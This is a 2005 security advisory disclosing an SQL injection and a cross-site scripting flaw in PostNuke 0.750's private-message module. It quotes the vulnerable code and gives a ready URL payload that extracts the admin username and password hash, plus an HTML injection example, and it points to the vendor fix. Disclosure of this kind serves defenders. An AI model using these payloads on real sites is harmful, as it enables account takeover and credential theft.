PostNuke Critical SQL Injection and XSS 0.750=>x
-=[ Critical SQL injection and XSS in PostNuke ]=-
Author: sp3x
Date: 27. May 2005
Affected software :
===================
PostNuke version : x=> 0.750
Description :
=============
PostNuke is an open source, open developement content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system. PostNuke
is still undergoing development but a large number of core functions are now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/
Vulnerabilities :
*****************
Critical SQL injection :
========================
Code :
------
/modules/Messages/readpmsg.php
=======================
$sql = "SELECT $column[msg_id] AS \"msg_id\",
$column[msg_image] AS \"msg_image\",
$column[subject] AS \"subject\",
$column[from_userid] AS \"from_userid\",
$column[to_userid] AS \"to_userid\",
$column[msg_time] AS \"msg_time\",
$column[msg_text] AS \"msg_text\",
$column[read_msg] AS \"read_msg\"
FROM $pntable[priv_msgs]
WHERE $column[to_userid]='" . (int)pnVarPrepForStore($userdata) .
"'";
$resultID =& $dbconn->SelectLimit($sql,1,$start);
if($dbconn->ErrorNo()<>0) {
error_log("DB Error: " . $dbconn->ErrorMsg());
echo $dbconn->ErrorMsg() . "<br />";
forumerror(0005);
}
=======================
First lets login -in as user in postnuke. Then send the message to yourself.
After that go to :
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0[SQL
inj]&total_messages=1
Note :
------
total_messages=1 - the id of total_messages must exist
Now you will see this error message
error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '[SQL injection],1' at
line 10
========================
Exploit SQL injection :
=======================
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null%20FROM%20pn_users%20WHERE%20pn_uid=2/*&total_messages=1
And we can see the admin md5 password and nick :)
Cross-site scripting - XSS :
============================
Thanks to error message we can also perform XSS attacks :)
Example :
---------
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0'<h1>cXIb8O3
and sp3x - SecurityReason</h1>&total_messages=1
And we get :
error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near ''[Our XSS],1' at line 10
========================
How to fix :
============
PNSA 2005-2
Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html
SHA1: 6e76d92124c833618d02dfdb87d699374120967d
MD5: a007e741be11389a986b1d8928a6c0e5
Size: 160550 Bytes
or CVS
Greets :
========
cXIb8O3 and pkw :)
Contact :
=========
sp3x[at]securityreason[dot].com
www.securityreason.com